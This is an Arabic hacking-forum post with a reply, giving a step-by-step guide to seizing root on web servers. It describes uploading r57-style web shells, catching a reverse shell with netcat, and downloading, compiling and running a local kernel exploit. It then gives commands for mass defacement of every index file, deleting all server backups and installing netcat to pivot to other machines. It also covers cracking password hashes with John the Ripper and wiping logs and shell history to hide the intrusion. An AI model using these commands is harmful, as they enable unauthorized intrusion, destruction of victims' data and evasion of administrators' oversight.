احتراف الروت: ماهو الروت وطريقة سحب الروت وما بعد الروت

[ANDERSON]

بسم الله الرحمن الرحيم

السلام عليكم ورحمة الله وبركاته

يعتبر هذا الموضوع انشاء الله مرجع كامل للروت وايضا ساحة
لاضافة جميع افكار الاعضاء والموضوع راح ينقسم الى الاقسام التاليه:


الجزء الاول: ماهو الروت (What is root)

الجزء الثاني: كيف يمكن الحصول على الروت (How can I get on the root)

الجزء الثالث: اللوكل روت وكيف البحث عنة (local root and how to search for him)

الجزء الرابع: اتصال بلسيرفر بكل الطريق (Contact server Every way)

الجزء الخامس: الحصول على الروت (Get to root)

الجزء السادس: ماذا بعد الروت (What happens after root)

الجزء السابع : مسح اثارك من السيرفر (Clear all tracks)

---------------------------------
الجزء الاول: ماهو الروت (What is root)

الروت: تعتبر هذه الصلاحيه من اعلى الصلاحيات التي يستطيع الشخص الحاصل عليها
بالتحكم الكامل بالسيرفر مثل اختراق جميع مواقع السيرفر
وسحب الدومينات وغيرها يعني ملخص الروت هو السيرفر يصبح بيدك بالكامل



الجزء الثاني: كيف يمكن الحصول على الروت (How can I get on the root)

هناك عدة طريق للحصول على صلاحية الروت ومنها :

1- استعمال اللوكال روت
ونقصد بيه استغلال ثغرة موجودة بكيرنل السيرفر وكلا على حسب اصدار الكيرنل

2- استغلال ثغرات برامج السيرفر
ونقصد به السيرفر مركب برامج طبعا كل سيرفر بيه برامج وقد يصاب
احد هذه البرامج بثغرة مثل ثغرة البفر اوفر فلو
فنقوم باستغلال هذه الثغرة حتى الوصول الى الى صلاحية الروت

3- قرائة ملفات يتواجد بيه باسورد الروت


الجزء الثالث: اللوكل روت وكيف البحث عنة (local root and how to search for him)

اللوكال هو برنامج مبرمج بلغة c يقوم باستغلال ثغرات الكيرنل
وهناك لوكلات مرتجمة وغير مترجة ونفرق بينهما عن طريق الامتداد
فاذا كان الامتداد c فيعني اللوكال غير مترجم ا
اما اذا كان امتداد اخر غيره فيعني اللوكال مترجم




الجزء الرابع: اتصال بلسيرفر بكل الطريق (Contact server Every way)

بعد ما حصلنا على اللوكال اني جاء وقت الاتصال بالسيرفر واستعمال اللوكال
وطبعا طرق الاتصال بالسيرفر كثيرة وشروحات لها بالمنتديات ايضا كثيرة
واغلبها تتطلب فتح بروت والاتصال عن طريق النت كات اغلب الاشخاص ما تنجح هذه الطريقة
فراح اشرح طريقة وهي ايضا مشروحة وهي الاتصال عن طريق النت كات لاك بدون فتح بورت
اولا تعمل حساب بموقع ريلاكس واكو شورحات توضح طريقة الحصول على الحساب
والان بعد الحصول على الحساب يمكنك ان تتصل وانشاء اتصال VPN
نبدء الشرح :

اول تحمل اداة النت كات
كود:
[]
بعد ما نفك الضغط عنها ننقلخا للهارد سي
ونرفع شل يدعك الاتصال بالسيرفر مثل r57 or Egy_Spider
بعد ما رفعنا الشل نروح لموجة الاوامر عن طريق
كود:
start >> run >> cmd
ندخل الامر /cd للدخول على هارد السي
ثم ندخل حافظة النت كات بالامر cd netcat
ثم نروح لموقع كود:
[]
حتى نطلع الايب بتاعنا
بعدها نروح لاخر الشل المرفوع نجد خانات نروح على الخانة الثانيه ونضع المعلومات فيها
1-ip لي احنة طلعناة من الموقع لي فوق
2-البورت وراح نستخدم بورت 443 البورت الخاص في اتصال ريلاكس
3-لانغير شيء
4-اتركه لاتضغط عليه

نرجع الى النت كات
ونكتب الامر
كود:
nc -vlp port
مع تغير port
الى 443 بورت اتصال ريلاكس
الان نضغط انتر (enter)
ونذهب الى الشل ونضغط رقم اربعة وهو (Connect)
والغير قادر على الحصول على حساب ريلاكس يستطيع استعمال هذا اليرنامج proXPN موجود بالكوكل




الجزء الخامس: الحصول على الروت (Get to root)

بعد ما اتصلنة بلسيرفر ووجدنة اللوكل المناسب الان نريد سحب الروت على السيرفر
اول شيء لحصول على الروت هو سحب لوكل على الموقع ويقصد ان يكون المجلد يحمل تصريح 777
ويسحب اللوكل بامر
كود:
wegt []
wegt<<<الامر السحب
www.xxx.com/local.zip<<<موقع لوكل او انتة ترفع لوكل على اي موقع مجاني ويفض لوكل بمتداد zip
الان تم السحب
نفق الضغط بامر
كود:
unzip local.zip
unzip<<<امر فك الضغط
local.zip<<<اسم لوكل مع الامتداد

الان نعطي لوكل تصريح 777 بامر
كود:
chmod 777 local.c
chmod<<<امر تغير تصريح اي ملف
777<<<رقم التصريح
local.c<<<لوكل

بعد ذلك نترجم اللوكل بامر التالي
كود:
gcc local.c –o local
بعد سوف تجد لوكل بدون امتداد هكذا
local
بعد ذلك نعطي اللوكل المترجم تصريح 777 بامر التالي
كود:
chmod 777 local
بعد ذلك نشغل اللوكل بامر
كود:
local ./
وسوف يشتغل لوكل
نقوم بتنفيذ الامر التالي لرؤية الاصلاحية الان
id
الان صلاحيتنة روت
ننفذ لامر التالي
su
لحصول على صلاحية روت كاملة


الجزء السادس: ماذا بعد الروت (What happens after root)

بعد ما حصلنا على الان تقدر تعمل اي شي تحبه مثل تغير جميع اندكسات السيرفر او ما يسمي بماس ديفاس
تكدر تسحب جميع سي بنلات المواقع وتلغم وغيرها من الاشياء فلك الصلاحية بكل شي
الان راح نشرح بعض الاعمال الي راح نقوم بها بعد الروت

اولا : تغيير جميع الاندكسات على السيرفر

كود:
find / -name "index.*" -exec cp index.html {} ;
كود:
find / -name "default.*" -exec cp index.html {} ;
وتستطيع ان تنفذ الاوامر في مكان سواء بالجذر او بالمسار الحالي
لكن يجب وجود الاندكس للاختراق بنفس مسارك عن تبيطق الامر
يعد ما تغير الاندكسات راح تلاحظ ملكية الملف الى root
وهذه بعض الاوامر الي تسطيع من خلاها تغير ملكية جميع ملفات الاندكس

كود:
find / -name "index.*" -exec chown 99 index.html {} ;
كود:
find / -name "default.*" -exec chown 99 index.html {} ;
ثانيا : حذف جميع ملفات الباك اب على السيرفر

كود:
find / -name "cpbackup*" -exec rm {} ;
كود:
find / -name "backup*" -exec rm {} ;
فيتم البحث عن كل مجلدو وملف باسم cpbackup او backup
وعلامة النجمة * تعير اي شي بعد الاسم

ثالثا : تركيب النت كات على سيرفر والاتصال من سيرفر الى اخر

بالبداية ندخل على السيرفر بصلاحية الروت

ثم نسحب النت كات بالامر التالي

كود:
wget []
ثم نفك الضغط عنها بالامر التالي

كود:
tar -xzf netcat-0.7.1.tar.gz
بعدها ندخل الى مجلد النت مات بالامر التالي

كود:
cd netcat-0.7.1
ثم نقوم بتنصيب النت كات بالامر

كود:
./configure
بعدهااكتب make وضغط انتر وبهذا نكون قد نصبنا النت كات على السيرفر
ومن خلالها راح تكدر تتصل على اي سيرفر اخر

رابعا : تنصيب برمانج جوهن (John the Ripper)

والفائدة من تركيبه هي لفك الهاشات ويكو نطريقة فكه سريعة
وطبعا الربنامج معروف بقوة فكه للهاشات زلتنصيبه نتبع الاتي:

اول شي نتأكد من امر gcc شغال حتى نكدر نترجم الجوهن

كود:
gcc; gcc: No input files
تمام شغال

بعدها ايضا نتأكد من امر Wegt اذا كان شغال

كود:
wget; wget: missing URL Usage: wget [OPTION]... [URL]... Try `wget --help' for more options
تمام ايضا شغال

الان نقوم بسحب برنامج الوجهن بالامر

كود:
wget http://www.openwall.com/john/b/john-1.6.tar.gz;
نتظر شوي حتى يكمل التحميل

بعد ذلك نفك الضغط عنه بواسطه الامر

كود:
tar -zxvf
بعد الفك نقوم بالدخول لمجلد john-1.6 بالامر

كود:
cd john-1.6;
بعدها نتوجه لملف src لكي نقوم بعمليه التركيب
cd src;

الان بعد ما دخلنا لمجلد src نقوم بكتابة الامر

كود:
make generic;
حتى الان الشغل تمام وتم تثبيته بالنجاح الان نتوجهإلى مجلد run داخل مجلد john-1.6
بواسطه الامر

كود:
cd ../run;
ثم نكتب الامر
كود:
;ls
للتاكد من الملفات راح نجد ملف John ,john.ini وبعض الملفات

الان نشرح طريقة سحب ملفات الباسورد لفكها

اولا نسحبها لمجلد run ولنفرض سحبنا ملف اسمه password.txt
ننفذ امر الفك وهو

كود:
./john -i:all pass.txt;
ونتظر حتى يتم الفك وبعدها راح يظهرلك الباسورد بعد الفك
او تكتب هذا الامر لرؤيته

كود:
./john -show pass.txt;
وهنا بعد الشغلات تعملها وهي اعطاء تصريحات لبعض الاوامر

اولا نقوم بعمل صلاحيات على gcc لاستخدامها من قبل الرووت فقط
كود:
[root@D3VIL]chmod 700 /usr/bin/gcc
بوضع صلاحيات على wget لإستخدامه من قبل الرووت

كود:
[root@D3VIL]chmod 700 /usr/bin/wget


الجزء السابع : مسح اثارك من السيرفر (Clear all tracks)

بعد اخذ صلاحية الروت وعلمت الي بدك فلازم نقوم بمسح اثارك على السيرفر
لان يوجد ملف اسمه لوقل هو ملف يقوم بحفظ اي بي تبعك واثاراك على السيرفر
طيب لازم نمسه والطريقة هي بعض الاوامر نطبقها وهي :
كود:
rm -rf /tmp/logs rm -rf $HISTFILE rm -rf /root/.ksh_history


للأمانة منقول

[MR.KaDeRoU]

بارك الله فيك على هدا العمل الرائع والمنظم